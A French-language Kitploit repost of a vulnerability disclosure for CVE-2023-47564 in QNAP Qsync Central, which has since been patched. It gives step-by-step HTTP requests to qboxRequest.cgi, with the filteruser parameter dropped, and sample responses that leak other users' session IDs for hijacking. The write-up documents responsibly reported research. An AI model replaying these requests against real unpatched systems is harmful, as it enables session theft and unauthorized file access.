Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-47564 — CVE-2023-47564 | Kitploit
Outils/GitHubGitHub/c411e/cve-2023-47564
Authentification et AutorisationAnalyse des VulnérabilitésExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubc411e/cve-2023-47564

CVE-2023-47564

CVE-2023-47564

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-47564

  • https://www.qnap.com/en/security-advisory/qsa-24-03
  • https://www.cve.org/CVERecord?id=CVE-2023-47564
  • CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N (8.1)

"Une attribution incorrecte d'autorisation pour une ressource critique a été signalée comme affectant Qsync Central. Si elle est exploitée, la vulnérabilité pourrait permettre à des utilisateurs authentifiés de lire ou de modifier la ressource via un réseau."

Date de découverte : 5 décembre 2023

Date de correction : 3 février 2024

Version(s) concernée(s) : Qsync Central 4.4.x, Qsync Central 4.3.x

Version(s) corrigée(s) : Qsync Central 4.4.0.15 (2024/01/04) et ultérieures, Qsync Central 4.3.0.11 (2024/01/11) et ultérieures

Résumé : Lors d'un récent test d'intrusion, j'ai obtenu un accès à un système QNAP en tant qu'utilisateur faiblement privilégié (ici user123). Il n'y avait aucun fichier intéressant, alors j'ai creusé un peu plus. Sur le système, seule l'application Qsync Central (https://www.qnap.com/en/app_releasenotes/list.php?app_choose=QsyncServer) était en cours d'exécution. J'ai d'abord essayé de trouver une liste de tous les utilisateurs disponibles et inspecté mon historique proxy. Je suis tombé sur le point de terminaison /cgi-bin/qsync/qboxRequest.cgi. Ce point de terminaison révélait des informations sur mon compte utilisateur actuel et également mon identifiant de session (sid) actuel.

La requête ressemblait à ceci :

root@kitploit:~
GET /cgi-bin/qsync/qboxRequest.cgi?sid=60ud018n&_dc=1701766637869&subfunc=qbox&genQboxDeviceList=1&sort=1&filteruser=user123 HTTP/2
Host: vulnhost.com
Cookie: DESKTOP=1; WINDOW_MODE=1; nas_wfm_tree_x=200; QSYNC_SID=60ud018n; QSYNC_USER=user123; NAS_SID=60ud018n; QT=1701766635952
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vulnhost.com/cgi-bin/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

La réponse était :

root@kitploit:~
HTTP/2 200 OK
Server: 
[...]

    <data>
        <device>
            <id><![CDATA[REDACTED]]></id>
            <type><![CDATA[3]]></type>
            <time><![CDATA[2023-12-05 09:57:14]]></time>
            <user><![CDATA[user123]]></user>
            <ip><![CDATA[REDACTED]]></ip>
            <sid><![CDATA[60ud018n]]></sid>
            <uid><![CDATA[REDACTED]]></uid>
            <action><![CDATA[1]]></action>
            <comp><![CDATA[Qsync-File Station]]></comp>
            <desc><![CDATA[File Station login Qsync]]></desc>
            <channel><![CDATA[0]]></channel>
            <online><![CDATA[0]]></online>
            <version><![CDATA[]]></version>
            <QsyncPath><![CDATA[/home/.Qsync]]></QsyncPath>
        </device>
    </data>
    <ret>0</ret>
</logroot>
</QDocRoot>

Intéressant était le paramètre filteruser. Je l'ai simplement supprimé et, à ma grande surprise, une liste de tous les utilisateurs et de leurs identifiants de session m'a été retournée ! J'ai donc pu détourner la session de tout autre utilisateur connecté. Pour une preuve de concept, j'ai utilisé l'une des sessions pour me connecter en tant qu'un autre utilisateur. J'ai signalé la vulnérabilité au programme de bug bounty de QNAP. La communication a été facile et un correctif a été déployé rapidement.

Étapes pour reproduire (en détail) :

  1. Connectez-vous à l'application web Qsync de QNAP en tant qu'attaquant avec un compte utilisateur normal et faiblement privilégié.

  2. Extrayez l'identifiant de session (sid) de l'attaquant depuis le cookie NAS_SID défini par l'application web Qsync.

  3. Utilisez la valeur sid de l'attaquant à la fois dans le cookie NAS_SID et dans le paramètre HTTP GET sid et effectuez la requête HTTP suivante :

    root@kitploit:~
    GET /cgi-bin/qsync/qboxRequest.cgi?sid=yl9osz6l&subfunc=qbox&genQboxDeviceList=1&sort=1 HTTP/2
    Host: vulnhost.com
    Cookie: NAS_SID=yl9osz6l;
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://vulnhost.com/cgi-bin/
    X-Requested-With: XMLHttpRequest
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    
  4. Les identifiants de session valides de tous les autres utilisateurs actuellement connectés à l'application web peuvent être extraits de la réponse HTTP, par exemple :

    root@kitploit:~
    HTTP/2 200 OK
    Server: 
    Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
    Vary: Referer
    X-Xss-Protection: 1; mode=block
    Strict-Transport-Security: max-age=0
    X-Content-Type-Options: nosniff
    Content-Type: text/xml
    Date: Tue, 05 Dec 2023 10:32:00 GMT
    
    <?xml version="1.0" encoding="UTF-8" ?>
    <QDocRoot version="1.0">
    <authPassed><![CDATA[1]]></authPassed><model><modelName><![CDATA[TS-X71U]]></modelName><internalModelName><![CDATA[TS-X71]]></internalModelName><platform><![CDATA[TS-NASX86]]></platform><platform_ex><![CDATA[X86_HASWELL]]></platform_ex><customModelName><![CDATA[]]></customModelName><displayModelName><![CDATA[TVS-471U-RP]]></displayModelName><sas_model><![CDATA[0]]></sas_model><storage_v2>1</storage_v2>
    <encryptfsSupported><![CDATA[1]]></encryptfsSupported></model>
    <firmware><version><![CDATA[5.1.1]]></version><number><![CDATA[2491]]></number><build><![CDATA[20230815]]></build><patch><![CDATA[0]]></patch><buildTime><![CDATA[2023/08/15]]></buildTime></firmware>
    <sp><![CDATA[ALPHA]]></sp><rfs_bits><![CDATA[32]]></rfs_bits><specVersion><![CDATA[1.0]]></specVersion><hostname><![CDATA[Data]]></hostname><DemoSiteSuppurt><![CDATA[no]]></DemoSiteSuppurt><customLogo><customFrontLogo><![CDATA[]]></customFrontLogo><customLoginLogo><![CDATA[]]></customLoginLogo></customLogo>
    <logroot>
    <ADSSupport><![CDATA[1]]></ADSSupport><trustedDomain><enable><![CDATA[0]]></enable></trustedDomain>
        <count>239</count>
        <data>
            <device>
                <id><![CDATA[REDACTED]]></id>
                <type><![CDATA[3]]></type>
                <time><![CDATA[2023-12-05 11:31:50]]></time>
                <user><![CDATA[victim]]></user>
                <ip><![CDATA[REDACTED]]></ip>
                <sid><![CDATA[12345678]]></sid></span>
                <uid><![CDATA[REDACTED]]></uid>
                <action><![CDATA[1]]></action>
                <comp><![CDATA[Qsync-File Station]]></comp>
                <desc><![CDATA[File Station login Qsync]]></desc>
                <channel><![CDATA[0]]></channel>
                <online><![CDATA[1]]></online>
                <version><![CDATA[]]></version>
                <QsyncPath><![CDATA[/home/.Qsync]]></QsyncPath>
            </device>
    [...]
    
Télécharger l’outil

La capture d'écran suivante illustre ce problème (pour des raisons de confidentialité, les identifiants de session ainsi que les informations d'identification de l'instance QNAP Qsync testée ont été masqués) :

Valeurs des identifiants de session divulguées
  • L'attaquant peut utiliser les valeurs sid extraites pour se connecter en tant que n'importe laquelle des victimes en définissant le cookie NAS_SID en conséquence. Cela permet à l'attaquant de détourner la session de la victime et de télécharger tout fichier stocké sur le système QNAP par la victime.